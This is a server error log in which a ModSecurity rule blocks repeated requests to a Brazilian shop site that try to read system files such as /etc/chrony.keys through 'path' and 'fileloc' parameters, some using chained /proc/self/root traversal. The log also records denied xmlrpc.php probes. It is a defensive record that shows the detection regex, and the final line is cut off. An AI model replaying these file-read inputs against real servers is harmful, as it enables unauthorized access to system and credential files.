[Fri Mar 20 10:20:22.875865 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.97:41888] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JlhCii7xarUs8iHaGWAAAAgc"]
[Fri Mar 20 10:20:23.019086 2026] [access_compat:error] [pid 11167:tid 140411674785536] [client 51.210.104.134:43157] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:23.396314 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.93:41686] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Jl_XLqtnMIWvjpaK3fQAAApY"]
[Fri Mar 20 10:20:23.561654 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.11:41926] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JlxCii7xarUs8iHaGWQAAAgU"]
[Fri Mar 20 10:20:23.683510 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:45918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jl_HIg5MgXLBnicMTNQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:20:24.067772 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.96:41968] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JmNa6ubjKNq_cu4b2sAAAA0c"]
[Fri Mar 20 10:20:24.502852 2026] [access_compat:error] [pid 26799:tid 140411708356352] [client 109.70.100.12:51420] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:24.675201 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.104:42018] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JmOoXxyEfFpUF8f-deAAAAU8"]
[Fri Mar 20 10:20:26.595206 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.244.43:34694] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1JmhCii7xarUs8iHaGXQAAAhI"]
[Fri Mar 20 10:20:26.746890 2026] [access_compat:error] [pid 15826:tid 140411649607424] [client 45.84.107.76:10461] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:28.143199 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.47:42258] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JnPXLqtnMIWvjpaK3ggAAApg"]
[Fri Mar 20 10:20:28.704936 2026] [:error] [pid 7235:tid 140411658000128] [client 216.73.216.191:42308] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/uct"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JnPqxLDW4GITHUkQG1gAAAQo"]
[Fri Mar 20 10:20:30.144615 2026] [access_compat:error] [pid 10189:tid 140411658000128] [client 192.42.116.94:19450] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:33.593947 2026] [:error] [pid 31215:tid 140411599251200] [client 57.141.18.8:42584] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JoQF0L0L-SsrnPo6GLwAAAtE"]
[Fri Mar 20 10:20:43.818009 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.111:43030] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JqvXLqtnMIWvjpaK3kgAAAoM"]
[Fri Mar 20 10:20:43.834947 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.106:42478] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Jq9a6ubjKNq_cu4b2xQAAA00"]
[Fri Mar 20 10:20:47.806780 2026] [access_compat:error] [pid 21219:tid 140411632822016] [client 66.56.80.177:35802] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:47.939522 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:40726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jr_HIg5MgXLBnicMTWwAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:20:51.257031 2026] [access_compat:error] [pid 15826:tid 140411725141760] [client 185.220.101.16:38326] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:59.343464 2026] [:error] [pid 11642:tid 140411632822016] [client 216.73.216.191:43776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ju7ninkcc-iUj5Ap6tQAAA40"]
[Fri Mar 20 10:21:03.388586 2026] [:error] [pid 11642:tid 140411641214720] [client 216.73.216.191:44074] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 9"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jv7ninkcc-iUj5Ap6uwAAA4w"]
[Fri Mar 20 10:21:05.782583 2026] [:error] [pid 11167:tid 140411699963648] [client 216.73.216.191:44258] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 8"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JwfHIg5MgXLBnicMTeQAAAcU"]
[Fri Mar 20 10:21:06.507294 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:44224] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/greenwich"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jwta6ubjKNq_cu4b22wAAA0Q"]
[Fri Mar 20 10:21:06.887494 2026] [:error] [pid 11167:tid 140411582465792] [client 216.73.216.191:44326] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 4"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JwvHIg5MgXLBnicMTewAAAdM"]
[Fri Mar 20 10:21:09.487780 2026] [:error] [pid 7235:tid 140411716749056] [client 216.73.216.191:44522] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-13"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JxfqxLDW4GITHUkQHBwAAAQM"]
[Fri Mar 20 10:21:09.504993 2026] [:error] [pid 21219:tid 140411691570944] [client 216.73.216.191:44528] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JxfXLqtnMIWvjpaK3tQAAAoY"]
[Fri Mar 20 10:21:09.599069 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:44534] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-12"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JxQF0L0L-SsrnPo6GYAAAAsc"]
[Fri Mar 20 10:21:09.840047 2026] [:error] [pid 7235:tid 140411683178240] [client 216.73.216.191:44554] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 5"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JxfqxLDW4GITHUkQHCQAAAQc"]
[Fri Mar 20 10:21:10.877778 2026] [access_compat:error] [pid 11642:tid 140411624429312] [client 188.126.94.252:37211] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:21:11.235196 2026] [:error] [pid 21219:tid 140411582465792] [client 216.73.216.191:44606] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 7"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jx_XLqtnMIWvjpaK3wQAAApM"]
[Fri Mar 20 10:21:12.373370 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:44744] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JyBCii7xarUs8iHaGswAAAg8"]
[Fri Mar 20 10:21:14.991331 2026] [:error] [pid 11642:tid 140411582465792] [client 216.73.216.191:44924] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jyrninkcc-iUj5Ap6wwAAA5M"]
[Fri Mar 20 10:21:15.750150 2026] [:error] [pid 31215:tid 140411733534464] [client 57.141.18.22:44982] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JywF0L0L-SsrnPo6GZQAAAsE"]
[Fri Mar 20 10:21:19.365862 2026] [access_compat:error] [pid 7235:tid 140411699963648] [client 149.102.238.136:37440] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:21:19.367856 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.88:45030] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id 